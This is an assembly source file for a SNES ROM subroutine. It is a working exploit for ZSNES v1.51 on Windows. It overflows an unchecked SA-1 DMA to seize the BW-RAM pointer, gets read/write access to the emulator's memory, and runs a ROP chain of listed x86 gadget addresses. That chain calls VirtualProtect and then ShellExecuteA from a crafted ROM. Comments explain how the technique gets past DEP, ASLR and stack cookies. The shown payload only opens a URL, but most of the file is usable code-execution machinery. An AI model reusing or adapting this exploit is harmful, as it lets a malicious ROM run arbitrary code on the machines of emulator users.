;cp ~/smw.smc .; chmod +x smw.smc; asar Z.asm smw.smc; cd sa1pack_124; asar sa1.asm ../smw.smc; cd ..
;rm 'Z!.sfc'; asar rom.asm 'Z!.sfc'

;This subroutine, when run in ZSNES v1.51 (official Windows build, or FuSoYa's 8MB version), will
; open a web browser on the given URL (the provided ROM and patch default to the ZMZ download page).
;Thanks to Vitor Vilela for showing me a crashy ROM (I've seen a lot of them, but never managed to
; get my hands on one), and for helpfulness with various SA-1 things.

function snestopc(var) = (var&0x7F0000>>1)|(var&0x7FFF) ; May require changes depending on which freespace it's placed in.

;You must set these two defines before including this file.
!UrlLocation += "" ; Can be a label in the ROM, or anywhere in I-RAM. If the latter, $3430 is recommended.
!UrlIsIRAM += "" ; Can be 1, 0, !True or !False. Asar cannot autodetect this, it panics about label in if statement.

!FreeRAM = $34C0 ; minimum size $300 bytes, minimum alignment 4 bytes, must be in I-RAM, must not touch $37FF
;this is compatible with Vitor Vilela's SA-1 patch; it screws up the Character Conversion DMA buffer,
; but that one should be unused anyways at this point (SA-1 shouldn't be running). And it's commented as safe to use on ZSNES.

ShowBrowser:
;On entry, the following must be true:
; The CPU is correctly initialized (emulation mode is off, stack is usable)
; The ROM contains a SA-1 chip
; The current CPU is the S-CPU, not SA-1
; Interrupts should be disabled
; !UrlLocation contains a NUL-terminated ASCII string containing an URL to send to the web browser.
; Resetting or savestating while this code is executing is likely to crash, but it only takes a few
;  hundred cycles, so you're unlikely to get a chance to do this unless you call it repeatedly.
; Call with JSL.
; The subroutine must be placed in banks $00-$3F or $80-$BF
;The following may not be touched, neither read nor written, neither by interrupts nor the other CPU, until this routine returns:
; Anything listed as changed below
; $37FF
; BW-RAM (yes, every single byte of the 128KB is off-limits)
;On exit, the following RAM and registers have changed:
; A, X, Y
; A couple of SuperFX registers (I doubt you can put SuperFX and SA-1 in the same ROM, but if you do, disable it)
; Everything in !FreeRAM
; The SA-1 DMA registers
; SNES DMA channel 7 (move your HDMA to channel 6 first)
;Results:
; If the used emulator is one of
;  ZSNES v1.51 official Windows build
;  ZSNES v1.51 FuSoYa-8MB build
; then a web browser will be opened, pointing to given URL.
;If the used emulator is something else, including real hardware and other ZSNES, it should do
; nothing, but may crash either the ROM or the host emulator.



;The bug is as follows: (warning: gets really heavy on technical details after a while)
;ZSNES does not range check SA-1 DMA, but instead allows them to overflow.
;The critical location is src/chips/sa1regs.asm, executesa1dma:. Using that bug, I can write up to
; 64KB after BW-RAM or I-RAM.
;I'm surprised it has remained hidden for so long.

;BW-RAM is 4MB after the ROM. There's nothing interesting nearby, and 64KB isn't enough to overflow
; the allocation (it's about 6MB). Exploiting a heap buffer overflow is also OS dependent.

;However, I-RAM is in a more favorable location; it's a global variable.
;And not only that - right after I-RAM comes a very valuable variable, namely the pointer to BW-RAM!
; Overwriting that makes ZSNES think BW-RAM is whereever I want.
;This allows me to read or write any memory I want in the process. ZSNES doesn't use ASLR, so
; everything is at known locations.
;The first thing I do is to inspect a very early part of the program to identify which ZSNES version
; this is (1.51 official, 1.51-FuSoYa-8MB, ...).
;Once I know which ZSNES we're in, I overwrite the read handlers for registers $2160 through $2165,
; and initiate a DMA from them to $213F (a read-only register, writing does nothing; this makes
; ZSNES destroy the minimum number of registers between each time it's my turn) that preserves the
; %ebp and %esp registers (%esp goes in one of the SuperFX registers; %ebp goes into %eax), and
; switches the stack to I-RAM, in which I have stored various return instructions that will end up
; at VirtualProtect. (The method seems to be named Borrowed Code Chunks Technique.)
;The stack chunks will save %eax (the previous %ebp) to another SuperFX register, mark the ROM
; executable using VirtualProtect (after locating it using GetProcAddress), and jump to it.
;The executable will restore %esp and %ebp, open a web browser to the given URL, set the ROM
; to non-executable, and jump to the end of the DMA routine.

;As far as I know, this does nothing that's not guaranteed by the Windows ABI to work, beyond
; relying on functions not using more than 512 bytes of stack.

;I am not aware of any migitation strategy in common use that would block this, except (of course)
;  fixing the overflow bug.
;DEP
;  While troublesome, a fancy fake stack that calls GetModuleHandle/GetProcAddress/VirtualProtect
;    easily defeats this.
;ASLR
;  I can leak a few pointers and calculate offsets on the 65816; I've got a pointer to the data
;    section right there, and ZSNES is full of function pointers that all give me the code section.
;Stack cookies
;  Unlikely to be possible to add to a program written in assembly
;  I'm not overflowing the stack, anyways
;  It would affect the amount of available ROP gadgets, but I should be able to leak the stack
;    pointer and read out the cookie
;  Alternatively, I may be able to extend the $2160 DMA shenanigans, such that each 'call' has a
;    matching 'ret'; this may be sufficient
;Control flow integrity
;  Not in common use
;  I doubt it can be implemented on common hardware with reasonable performance
;  I doubt it can be implemented in a program written in assembly
;G-Free <https://www.iseclab.org/papers/gfree.pdf>
;  Not in common use, I'm not even sure if any non-prototype implementation exists
;  Would be very tough to gain code execution under this, despite having r/w on the entire program
;    memory
;Mapping all long buffers to separate pages, with guard pages in between
;  Not in common use, because it carries incredible memory use penalties
;  Hard to implement in a program written in assembly, since some locations rely upon being next to
;    each other and it's hard to detect which (some C programs do exactly that, but that's
;    undefined behaviour and the compiler is allowed to punish it)
;Recompiling
;  Not in common use. Windows users all download the same programs, and while Linux users are more
;    varied, ZSNES is quite annoying to compile, so users are very likely to rely on their distro.
;    (Not sure about OSX, probably roughly the same situation as Windows.)
;Range checking stuff
;  While reasonably common, its use was neglected here. Doing this would be a surefire way to lock
;    me out, assuming there are no other bugs (not really likely).



;Do not change anything past this point.



math round off ; if rounding is on, values with the 32nd bit set turn into unconditional 0x80000000
cleartable

!True = 1
!False = 0

;RAM map (add !FreeRAM):

;some of the called functions need a bit of stack; GetProcAddress uses 0x174 bytes on XP, and while 0x50 bytes
; are already popped on entry and can be reused, I'd rather allow it at least 0x200 bytes so it can grow on other OSes.
!RAM_StackReserve = $000 ; therefore, this is reserved for that purpose
!RAM_Stack = $1F0 ; stack pointer is put here
!RAM_StackEnd = $300 ; stack ends here

!RAM_SNESBase = !FreeRAM
!RAM_NatBase = !FreeRAM-$3000
!RAM_7FFSource = !RAM_NatPointer-6

!RAM_mode7xpos = $300 ; 4 bytes
!RAM_7FFbackup = $304 ; 10 bytes
;$00E-$00F are unused
!RAM_NatPointer = $310 ; 4 bytes; must start at $3006 or later

!RAM_Text = $314 ; 28 bytes
!RAM_TextEnd = $330



assert $3000 <= !FreeRAM, "FreeRAM must be in I-RAM"
assert !FreeRAM < $3800, "FreeRAM must be in I-RAM"
assert !FreeRAM < $3500, "FreeRAM must be at least $300 bytes"
assert !FreeRAM < $34FF, "FreeRAM must not touch $37FF"
assert !FreeRAM&3 = 0, "FreeRAM must be aligned to at least 4 bytes"

assert !RAM_SNESBase+!RAM_7FFSource >= $3000, "RAM_NatPointer must start at $3006 or later"



;ZSNES register use while executing opcodes:
;eax - value to be written, scratch
;ebx - current opcode byte, scratch
;ecx - current address, scratch?
;edx.h - cycle counter?
;edx.l - something important; cpu flags?
; these four can be overwritten I think
;esi - next opcode to execute (pointer to ROM)
;edi - opcode dispatch table
;ebp - pointer to where the SPC is executing?
;esp - stack
; must be preserved

macro write16(loc, val)
;print "<loc> = <val> : ",hex(<val>&0xFFFF),",",hex(<val>)
if <val>&0xFFFF != 0
LDA.w #<val>&0xFFFF ; can't let Asar mask here, 32nd bit bug again
STA <loc>
else
STZ <loc>
endif
endmacro

macro write32(loc, val)
%write16(<loc>, <val>)
%write16(<loc>+2, <val>>>16)
endmacro

macro write32l(loc, val)
LDA.w #<val>&0xFFFF ; can't let Asar mask here, 32nd bit bug again
STA.l <loc>
if <val>&0xFFFF != <val>>>16 : LDA #<val>>>16
STA.l <loc>+2
endmacro

macro dd(val)
dw <val>&0xFFFF ; stupid Asar bugs
dw <val>>>16
endmacro

macro dd2(val1, val2)
%dd(<val1>)
%dd(<val2>)
endmacro

macro dd3(val1, val2, val3)
%dd(<val1>)
%dd(<val2>)
%dd(<val3>)
endmacro

macro dd4(val1, val2, val3, val4)
%dd(<val1>)
%dd(<val2>)
%dd(<val3>)
%dd(<val4>)
endmacro

macro IRAMCopy(dst, src, len)
;Mode (no conversion, to I-RAM, from I-RAM)
;bits 00010111 are used
LDY #%11101010
STY $2230
;Source
LDA.w #<src>
STA $2232
;STZ $2234;this hits $2235 too; this does no harm, it's overwritten later
;the source top byte is masked away for I-RAM sources
;Size
LDA.w #<len>
STA $2238
;Target offset
LDA.w #<dst>
STA $2235
endmacro


macro memcpy_mvn(dst, src, len)
LDY.w #<dst>
LDX.w #<src>
LDA.w #<len>
MVN <dst>>>16,<src>>>16
endmacro

macro SetBWRAMPtr(ptr)
%write32(!RAM_SNESBase+!RAM_NatPointer, <ptr>)
JSR .WriteBWRAMPtr
endmacro

PHB
PEA $0000
PLB
PLB
PHP
SEP #$30
LDA #$40
STA $2200 ; lock the SA-1 if it's running
REP #$20

;back up the original BW-RAM pointer
%IRAMCopy(!RAM_NatBase+!RAM_7FFbackup, $07FF, 10)

%SetBWRAMPtr(0x00400000)
REP #$10
LDA $401002 ; hey look, I'm using PC addresses in the SNES.
CMP #$9340
BEQ +
JMP .NotZsnesw151
+
;LDY #.Zsnesw151_Bytes
;BRA .Exec
;.NotZsnesw151:
;CMP #$81C0
;BNE .NotZsnesw151FuSoYa
;LDY #.Zsnesw151FuSoYa_Bytes
;BRA .Exec
;
;.NotZsnesw151FuSoYa
;;unknown build, or not ZSNES; sorry, can't do anything
;.Return
;;restore BW-RAM pointer
;%IRAMCopy($07FF, !RAM_NatBase+!RAM_7FFbackup, 10)
;
;TDC
;CMP #$3000
;BNE + ; SA-1 patch not installed, keep SA-1 frozen
;TAY
;STY $2200
;+
;
;PLP
;PLB
;RTL




.Zsnesw151:
!IRAM_Zsnesw151 = 0x0071A6C4
;the following registers are pushed during DMA handling:
; eax esi edi ecx edx
;register use during DMA handling:
; eax - free, initially garbage
; ebx - UNSAFE; set to 00 between each iteration
; ecx - UNSAFE; current 'snippet pc' (0x002160 and higher)
; edx - safe to use temporarily, but 4 is subtracted every fourth iteration, and if <= 4, the loop ends
; esi - free, initially garbage
; edi - free, initially garbage
; ebp - must be preserved

;useful snippets:
;
;nop: 00401052: ret
;
;read rare registers:
;esp:
;00403870: adc eax, esp; ret [clear eax first; execute and eax,-2 later]
;ebp:
;004203A2: xchg ebp, eax; ret
;esi:
;00407766: xchg esi, eax; ret
;
;write rare registers:
;ebp:
;004203A2: xchg ebp, eax; ret
;
;access common registers:
;0041F743: mov eax, ebx; ret
;0041ED70: mov eax, ecx; ret
;0068CCD6: mov eax, edx; ret
;0066C0CB: xchg ecx, eax; ret
;
;access memory:
;006BD6AC: mov eax, [eax]; ret
;00691222: mov eax, [ecx]; ret
;00619730: mov [eax], ebx; ret
;0068C115: mov [eax], ecx; ret
;0068C12B: mov [eax], edx; ret
;0068E36B: mov [ecx], eax; ret
;0069421D: mov [ecx], edx; ret
;0060A20B: mov [edi], eax; ret
;00616151: mov [edi], ebx; ret
;00615F52: mov [edi], edx; ret
;00612295: mov [edx], eax; ret
;0062F2B3: mov [edx], ecx; ret
;
;load values:
;0052C5C4: mov eax, [0x77dce8]; ret [.mode7xpos]
;0052C516: mov eax, [0x77dcf8]; ret [.mode7xrpos]
;
;math:
;00408A8B: add eax, ecx; ret
;006934AC: add eax, edx; ret
;0045CF90: add ebx, eax; ret
;0060D80E: neg eax; ret
;0041CF01: not eax; ret
;
;control flow:
;006BAF4C: call eax; ret
;00441C96: leave; ret
;
;pop register:
;0041BC17: pop eax; ret
;00403A86: pop ebp; ret
;004010CC: pop ebx; ret
;0040B773: pop ecx; ret
;00401253: pop edi; ret
;004325E6: pop edx; ret
;004010FB: pop esi; ret
;006BBF0F: pop esp; ret
;
;zero register:
;00421EC8: xor eax, eax; ret
;00409E33: xor ebx, ebx; ret
;00441C95: xor ecx, ecx; ret
;00682E53: xor edx, edx; ret
;00693D1B: xor esi, esi; ret
;
;preserve values:
;006193D3: mov [0x718110], eax; ret [SfxR0]
;006193E4: mov [0x718114], eax; ret [SfxR1]
;006193F5: mov [0x718118], eax; ret [SfxR2]
;00619406: mov [0x71811c], eax; ret [SfxR3]
;00619417: mov [0x718120], eax; ret [SfxR4]
;00619428: mov [0x718124], eax; ret [SfxR5]
;00619439: mov [0x718128], eax; ret [SfxR6]
;0061944A: mov [0x71812c], eax; ret [SfxR7]
;0061945B: mov [0x718130], eax; ret [SfxR8]
;0061946C: mov [0x718134], eax; ret [SfxR9]
;0061947D: mov [0x718138], eax; ret [SfxR10]
;0061948E: mov [0x71813c], eax; ret [SfxR11]
;0061949F: mov [0x718140], eax; ret [SfxR12]
;006194B0: mov [0x718144], eax; ret [SfxR13]


;useful pointers:
;code:
;004271D6 - start of CPU DMA loop
;00441C97 - start of the BCCT "execution"
;0062E2A6 - start of SA-1 DMA

;data:
;0071A6C4 - start of IRAM
;00C62C68 - pointer to romdata
;xxxxxxxx - pointer to wramdata

;IRAM = (byte*)0x0071A6C4
;romdata = *(byte**)0x00C62C68
;wramdata = *(byte**)xxxxxxxx


REP #$10
%memcpy_mvn(!RAM_SNESBase+!RAM_Text, .text, .text_end-.text)
%memcpy_mvn(!RAM_SNESBase+!RAM_Stack, ..iramdata, ..iramdata_end-..iramdata)
SEP #$10
%SetBWRAMPtr(0x0077DCE8) ; .mode7xpos
LDA $400000
STA !RAM_SNESBase+!RAM_mode7xpos
LDA $400002
STA !RAM_SNESBase+!RAM_mode7xpos+2
%write32l($400000, !IRAM_Zsnesw151+!RAM_NatBase+!RAM_Stack-4) ; put a pointer to start of IRAM where I can read it using only stackless gadgets

%SetBWRAMPtr(0x00CB7560+($2160*4)) ; location of register read handlers
LDA.w #..registers
JMP .ExecuteHack

..registers:
;stupid Asar 32bit bug forcing me to macro it
%dd(0x00421EC8); $2160 - xor eax, eax; ret
%dd(0x00403870); $2161 - adc eax, esp; ret (carry known true due to CMP 0x2163,0x48FF earlier)
%dd(0x006193D3); $2162 - mov [0x718110], eax; ret [SfxR0]
%dd(0x0052C5C4); $2163 - mov eax, [0x77dce8]; ret [.mode7xpos]
;%edx decrement
%dd(0x004203A2); $2164 - xchg ebp, eax; ret
%dd(0x00441C96); $2165 - leave; ret
...end


..iramdata:
base !IRAM_Zsnesw151+!RAM_NatBase+!RAM_Stack

%dd(0x006193E4)                ; mov [0x00718114], eax [SfxR1]

%dd2(0x0041BC17, 0x00C62C68)   ; pop eax / romdata
%dd(0x006BD6AC)                ; mov eax, [eax]
%dd2(0x0040B773, snestopc(..FinalDestination)) ; pop ecx / (PC address)
%dd(0x00408A8B)                ; add eax, ecx

%dd2(0x0040B773, ...lpAddress) ; pop ecx / (part of our stack)
%dd(0x0068E36B)                ; mov [ecx], eax
%dd2(0x0040B773, ...FinalDestP); pop ecx / (part of our stack)
%dd(0x0068E36B)                ; mov [ecx], eax
%dd(0x006193F5)                ; mov [0x00718118], eax [SfxR2]

%dd2(0x0041BC17, 0x006C8124)   ; pop eax / &GetModuleHandle
%dd(0x006BD6AC)                ; mov eax, [eax]
%dd2(0x0040B773, ...GetModHndl); pop ecx / destination
%dd(0x0068E36B)                ; mov [ecx], eax

%dd2(0x0041BC17, 0x006C8090)   ; pop eax / &GetProcAddress
%dd(0x006BD6AC)                ; mov eax, [eax]
%dd2(0x0040B773, ...GetPrcAddr); pop ecx / destination
%dd(0x0068E36B)                ; mov [ecx], eax

...GetModHndl: dd $55555555
%dd(0x0040B773)                ; pop ecx (part of the next one)
%dd(!IRAM_Zsnesw151+.text_kernel32) ; lpModuleName

%dd(...hModule)                ; popped to ecx
%dd(0x0068E36B)                ; mov [ecx], eax

...GetPrcAddr: dd $55555555
%dd(0x0040B773)                ; pop ecx (part of the next one)
...hModule: dd $55555555       ; hModule
%dd(!IRAM_Zsnesw151+.text_VirtualProtect) ; lpProcName

%dd(...VirtualPrt)             ; popped to ecx
%dd(0x0068E36B)                ; mov [ecx], eax

%dd(0x00619406)                ; mov [0x0071811C], eax [SfxR3]

...VirtualPrt: dd $55555555
...FinalDestP: dd $55555555
...lpAddress: dd $55555555     ; lpAddress
%dd(0x10000)                   ; dwSize
%dd(0x20)                      ; flNewProtect = PAGE_EXECUTE_READ
...lpflOldProtect: %dd(...lpflOldProtect) ; lpflOldProtect - overwrite your own pointer, I don't care.

warnpc !IRAM_Zsnesw151+!RAM_NatBase+!RAM_StackEnd
base off
...end


..FinalDestination:
;restore some CPU registers
db $B8 : dd $00718110       ; mov eax, 0x00718110   ; SfxR0
db $8B,$68, $04             ; mov ebp, [eax+4]      ; SfxR1
db $8B,$20                  ; mov esp, [eax]        ; SfxR0
db $83,$C4, $07             ; add esp, 7
db $50                      ; push eax

db $6A, $05                 ; push 5      ; INT nShowCmd = SW_SHOW
db $6A, $00                 ; push 0      ; LPCTSTR lpDirectory
db $6A, $00                 ; push 0      ; LPCTSTR lpParameters
if !UrlIsIRAM
db $68 : dd !IRAM_Zsnesw151+!UrlLocation-$3000 ; push !UrlLocation
else
db $A1 : dd $00C62C68       ; mov eax, [0x00C62C68] ; romdata
db $05 : dd snestopc(!UrlLocation) ; add eax, snestopc(!UrlLocation)
db $50                      ; push eax    ; LPCTSTR lpFile
endif
db $6A, $00                 ; push 0      ; LPCTSTR lpOperation
db $6A, $00                 ; push 0      ; HWND hwnd
db $FF,$15 : dd $006C81E0   ; call [0x006C81E0] ; ShellExecuteA

;restore protection flags
db $58                      ; pop eax
db $50                      ; push eax          ; lpflOldProtect (SfxR0)
db $6A, $04                 ; push 0x04         ; flNewProtect
db $68 : dd $00010000       ; push 0x10000      ; dwSize
db $FF,$70, $08             ; push [eax+8]      ; lpAddress (SfxR2)
db $68 : dd $004272B7       ; push 0x004272B7   ; return address

;restore the SuperFX register high bytes
db $97                      ; xchg edi, eax
db $31,$C0                  ; xor eax,eax
db $AB                      ; stosd             ; SfxR0
db $AB                      ; stosd             ; SfxR1
db $AB                      ; stosd             ; SfxR2
db $87,$07                  ; xchg eax, [edi]   ; SfxR3
db $FF,$E0                  ; jmp eax           ; VirtualProtect





.NotZsnesw151:
CMP #$81C0
BEQ .Zsnesw151FuSoYa
;unknown build, or not ZSNES; sorry, can't do anything
JMP .NotZsnesw151FuSoYa

.Zsnesw151FuSoYa:
;useful pointers (FuSoYa version):
;0062E391 - SA-1 DMA
;007296DC - I-RAM
;00729EE1 - BW-RAM pointer, must not be zeroed
!IRAM_Zsnesw151FuSoYa = 0x007296DC
REP #$10
%memcpy_mvn(!RAM_SNESBase+!RAM_Text, .text, .text_end-.text)
%memcpy_mvn(!RAM_SNESBase+!RAM_Stack, ..iramdata, ..iramdata_end-..iramdata)
SEP #$10
%SetBWRAMPtr(0x0078CB40) ; .mode7xpos
LDA $400000
STA !RAM_SNESBase+!RAM_mode7xpos
LDA $400002
STA !RAM_SNESBase+!RAM_mode7xpos+2
%write32l($400000, !IRAM_Zsnesw151FuSoYa+!RAM_NatBase+!RAM_Stack-4) ; put a pointer to start of IRAM where I can read it using only stackless gadgets

%SetBWRAMPtr(0x00CC7000+($2160*4)) ; location of register read handlers
LDA.w #..registers
JMP .ExecuteHack

..registers:
%dd(0x00421C0E); $2160 - xor eax, eax; ret
%dd(0x004038E0); $2161 - adc eax, esp; ret (carry known true due to CMP 0x2163,0x48FF earlier)
%dd(0x006194F3); $2162 - mov [0x00727128], eax; ret [SfxR0]
%dd(0x0052C4F4); $2163 - mov eax, [0x0078CB40]; ret [.mode7xpos]
;%edx decrement
%dd(0x00420053); $2164 - xchg ebp, eax; ret
%dd(0x00441BC6); $2165 - leave; ret


..iramdata:
base !IRAM_Zsnesw151FuSoYa+!RAM_NatBase+!RAM_Stack

%dd(0x00619504)                ; mov [0x0072712C], eax [SfxR1]

%dd2(0x00402B8D, 0x00C72708)   ; pop eax / romdata
%dd(0x00408FED)                ; mov eax, [eax]
%dd2(0x0040BC2A, snestopc(..FinalDestination)) ; pop ecx / (PC address)
%dd(0x0040908C)                ; add eax, ecx

%dd2(0x0040BC2A, ...lpAddress) ; pop ecx / (part of our stack)
%dd(0x0068E8EB)                ; mov [ecx], eax
%dd2(0x0040BC2A, ...FinalDestP); pop ecx / (part of our stack)
%dd(0x0068E8EB)                ; mov [ecx], eax
%dd(0x00619515)                ; mov [0x00727130], eax [SfxR2]

%dd2(0x00402B8D, 0x006D2138)   ; pop eax / &&GetModuleHandle
%dd(0x00408FED)                ; mov eax, [eax]
%dd2(0x0040BC2A, ...GetModHndl); pop ecx / destination
%dd(0x0068E8EB)                ; mov [ecx], eax

%dd2(0x00402B8D, 0x006D2088)   ; pop eax / &&GetProcAddress
%dd(0x00408FED)                ; mov eax, [eax]
%dd2(0x0040BC2A, ...GetPrcAddr); pop ecx / destination
%dd(0x0068E8EB)                ; mov [ecx], eax

...GetModHndl: dd $55555555
%dd(0x0040BC2A)                ; pop ecx (part of the next one)
%dd(!IRAM_Zsnesw151FuSoYa+.text_kernel32) ; lpModuleName

%dd(...hModule)                ; popped to ecx
%dd(0x0068E8EB)                ; mov [ecx], eax

...GetPrcAddr: dd $55555555
%dd(0x0040BC2A)                ; pop ecx (part of the next one)
...hModule: dd $55555555       ; hModule
%dd(!IRAM_Zsnesw151FuSoYa+.text_VirtualProtect) ; lpProcName

%dd(...VirtualPrt)             ; popped to ecx
%dd(0x0068E8EB)                ; mov [ecx], eax

%dd(0x00619526)                ; mov [0x00727134], eax [SfxR3]

...VirtualPrt: dd $55555555
...FinalDestP: dd $55555555
...lpAddress: dd $55555555     ; lpAddress
%dd(0x10000)                   ; dwSize
%dd(0x20)                      ; flNewProtect = PAGE_EXECUTE_READ
...lpflOldProtect: %dd(...lpflOldProtect) ; lpflOldProtect - overwrite your own pointer, I don't care.

warnpc !IRAM_Zsnesw151FuSoYa+!RAM_NatBase+!RAM_StackEnd
base off
...end


..FinalDestination:
;restore some CPU registers
db $B8 : dd $00727128       ; mov eax, 0x00727128   ; SfxR0
db $8B,$68, $04             ; mov ebp, [eax+4]      ; SfxR1
db $8B,$20                  ; mov esp, [eax]        ; SfxR0
db $83,$C4, $07             ; add esp, 7
db $50                      ; push eax

db $6A, $05                 ; push 5      ; INT nShowCmd = SW_SHOW
db $6A, $00                 ; push 0      ; LPCTSTR lpDirectory
db $6A, $00                 ; push 0      ; LPCTSTR lpParameters
if !UrlIsIRAM
db $68 : dd !IRAM_Zsnesw151FuSoYa+!UrlLocation-$3000 ; push !UrlLocation
else
db $A1 : dd $00C72708       ; mov eax, [0x00C72708] ; romdata
db $05 : dd snestopc(!UrlLocation) ; add eax, snestopc(.text_ZMZUrl)
db $50                      ; push eax    ; LPCTSTR lpFile
endif
db $6A, $00                 ; push 0      ; LPCTSTR lpOperation
db $6A, $00                 ; push 0      ; HWND hwnd
db $FF,$15 : dd $006D220C   ; call [0x006D220C] ; ShellExecuteA

;restore protection flags
db $58                      ; pop eax
db $50                      ; push eax          ; lpflOldProtect (SfxR0)
db $6A, $04                 ; push 0x04         ; flNewProtect
db $68 : dd $00010000       ; push 0x10000      ; dwSize
db $FF,$70, $08             ; push [eax+8]      ; lpAddress (SfxR2)
db $68 : dd $00427217       ; push 0x00427217   ; return address

;restore the SuperFX register high bytes
db $97                      ; xchg edi, eax
db $31,$C0                  ; xor eax,eax
db $AB                      ; stosd             ; SfxR0
db $AB                      ; stosd             ; SfxR1
db $AB                      ; stosd             ; SfxR2
db $87,$07                  ; xchg eax, [edi]   ; SfxR3
db $FF,$E0                  ; jmp eax           ; VirtualProtect



.ExecuteHack:
REP #$10
TAX
PHB
LDY.w #$400000&$FFFF
;dst (x) is already set
LDA.w #4*6 ; 6 registers need writing, and there's 4 of them
MVN $400000>>16,ShowBrowser>>16
PLB
SEP #$10

LDA #$3F00 ; CPU(increment)->PPU(1reg), to register $213F (it's a read register, writing does nothing)
STA $4370
STZ $4373
LDA #$2160 ; CPU address, $002160
STA $4372
STZ $4375 ; 65536 bytes
LDY #$80
STY $420B ; using DMA channel 7 so I can stick trash in %eax and not worry

;restore the registers I mangled; I'll copy the $2168..$216F handlers.
REP #$10
TAX
PHB
LDY.w #$400000&$FFFF
LDX.w #$400000+32&$FFFF
;dst (x) is already set
LDA.w #32 ; 6 registers need writing, and there's 4 of them
MVN $400000>>16,$400000>>16
PLB
SEP #$10


.NotZsnesw151FuSoYa:
;unknown build, or not ZSNES; sorry, can't do anything
;restore BW-RAM pointer
;%IRAMCopy($07FF, !RAM_NatBase+!RAM_7FFbackup, 10)

TDC
CMP #$3000
BNE + ; SA-1 patch not installed, keep SA-1 frozen
TAY
STY $2200
+

PLP
PLB
RTL

.WriteBWRAMPtr:
%IRAMCopy($07FF, !RAM_NatBase+!RAM_7FFSource, 10)
RTS

.text:
base !RAM_NatBase+!RAM_Text
..VirtualProtect: db "VirtualProtect",0
..kernel32: db "KERNEL32",0 ; put this one last, GetProcAddress uses a grotesque amount of stack (0x174) that may hit this too
warnpc !RAM_NatBase+!RAM_TextEnd
base off
..end

math round on
